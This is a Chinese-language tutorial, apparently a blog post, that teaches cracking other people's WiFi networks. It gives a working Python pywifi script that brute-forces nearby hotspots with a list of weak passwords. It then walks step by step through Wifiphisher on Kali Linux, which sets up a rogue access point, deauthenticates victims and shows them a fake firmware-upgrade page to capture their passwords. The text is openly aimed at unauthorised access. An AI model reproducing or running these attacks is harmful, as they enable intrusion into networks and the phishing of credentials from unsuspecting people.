WIFI破解，Python程序員必學技能。WIFI已經完全普及，現在Python程序員沒網，走到哪里都不怕！教你們一招，如何在圖片中提取Python腳本代碼。圖片發送至手機QQ長按后點識別圖片中漢字，如果你還不知曉，趕緊去試一試，能給我們減少很大的工作量。

想要WIFI破解，python+字典，這是是少不了的。熱點加弱口令也是核心。字典自己加精，你的字典有強大，你能破解的WIFI就越多。后面就不再提了。提供兩種方法，一般人學到一種即可。

方法一

環境準備

python2.7

pywifi模塊

字典

清除系統中的任何wifi連接記錄

導入模塊

這里用的模塊就這三個 pywifi的_wifiutil_linux.py腳本的 _send_cmd_to_wpas方法中的if reply != b'OK ':判斷需要修改，不然會有很多的提示信息。

from pywifi import *import timeimport sys

字典準備

隨機搞的wifi弱口令TOP10

123456781234567898888888812345678900000000087654321666688881122334414725836911111111

配置掃描器

推薦掃描時常可以設置在15-20秒之間 測試時常則可以自定義，考慮到認證速度于距離的關系，我一般設置在15左右，再久的也沒意義 到時候就算破解成功的熱點，信號也好不到哪里。

def main(): #掃描時常 scantimes = 3 #單個密碼測試延遲 testtimes = 15 output = sys.stdout #結果文件保存路徑 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #實例化一個pywifi對象 wifi = PyWiFi() #選擇定一個網卡并賦值于iface iface = wifi.interfaces()[0] #通過iface進行一個時常為scantimes的掃描并獲取附近的熱點基礎配置 scanres = scans(iface,scantimes) #統計附近被發現的熱點數量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s %-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s %s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70) #將每一個熱點信息逐一進行測試 for i,x in enumerate(scanres): #測試完畢后，成功的結果講存儲到files中 res = test(nums-i,iface,x,keys,output,testtimes) if res: open(files,"a").write(res)

掃描周圍熱點

def scans(face,timeout): #開始掃描 face.scan() time.sleep(timeout) #在若干秒后獲取掃描結果 return face.scan_results()

熱點測試

這里后續推薦將掃描過程數據入庫，防止重復掃描，且更加直觀。

def test(i,face,x,key,stu,ts): #顯示對應網絡名稱，考慮到部分中文名嘖顯示bssid showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid #迭代字典并進行爆破 for n,k in enumerate(key): x.key = k.strip() #移除所有熱點配置 face.remove_all_network_profiles() #講封裝好的目標嘗試連接 face.connect(face.add_network_profile(x)) #初始化狀態碼，考慮到用0會發生些邏輯錯誤 code = 10 t1 = time.time() #循環刷新狀態，如果置為0則密碼錯誤，如超時則進行下一個 while code!=0 : time.sleep(0.1) code = face.status() now = time.time()-t1 if now>ts: break stu.write(" %-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace(" ",""))) stu.flush() if code == 4: face.disconnect() return "%-*s| %s | %*s |%*s "%(20,x.ssid,x.bssid,3,x.signal,15,k) return False

案例

這里顯示本次測試使用了11個弱口令，并掃描到了20個熱點，然后開始坑爹的跑起來了

WIFIID熱點的id號 每跑一個會減1

SSID OR BSSID熱點的ssid名或mac地址

N對熱點的連接狀態，這個在

time當前所花去的時間

signal熱點的信號強度，若小越好

KEYNUM測試密碼的id 每跑一個會減1

KEY當前測試的密碼

方法二

目前常見的Wi-Fi加密方式有WEP、WPA2和WPS（鏈接為各自的破解方式），不過有網友反映以往破解WPA2的方法耗時太長，而且不適用于所有WPS啟動的接入點。而今天介紹的這種方法則更加省時省力。

主要原理

創建一個偽AP來“貍貓換太子”，然后撤銷用戶AP的授權，

通知用戶需要進行“固件升級”，需要重新驗證密碼。你的假AP由于具有相同的SSID，用戶便會“交代”密碼。

這樣你就能得到用戶的密碼，并且讓用戶采用你的偽AP做為自己的接入點。而對方一無所知。

之前也有類似的腳本，例如Airsnarf；不過我們這次采用的是Wifiphisher，這個優化過的自動化腳本比起前者更加方便。

要完成上述“大業”，你需要KaliLinux和兩個無線適配器，其中一個必須能支持數據包注入。

第一步：下載Wifiphisher

如圖所示，這是已經解開了的Wifiphisher源代碼。

當然，如果你懶，也可以復制GitHub上的代碼，不用謝~

第二步：導航到該目錄

接下來，導航到Wifiphisher創建時被解壓的目錄。就圖示而言，為/wifiphisherWi-Fi1.1。

當你看到目錄內容時，你會看到wifiphisher.py的腳本。

第三步：運行腳本

可以鍵入下面的腳本實現。

kali > python wifiphisher.py

注意這里有一個問題：

如果是第一次運行腳本的話，它可能會出現提示安裝hostpad的信息，鍵入Y繼續安裝即可。

完成的時候，再次運行Wifiphisher腳本。

這次將運行8080和43端口的Web服務器，然后開始搜索附近的Wi-Fi網絡。

等待搜索完成，我們會發現一系列Wi-Fi網絡名。最下方的wonderhowto就是我們的目標。

第四步：獲取密碼

按下Ctrl+C，鍵入想要復制的AP數，在這里我們選擇12。

敲下回車，Wifiphisher會顯示如下結果，顯示了正在使用的界面，還有正被攻擊及復制的AP所在的SSID。

目標用戶已經取消驗證他們的AP，隨后會出現一個固件升級的信息，請求他們重新驗證。一旦重新驗證，他們接入的就是偽接入點了。

當用戶輸入密碼，它會通過Wifiphisher的開放終端傳輸給你，隨后他們依然像平時一樣上網，風平浪靜，然而他們并不知道我們已經獲得了密碼。

現在你可以開始愉快地蹭Wi-Fi了！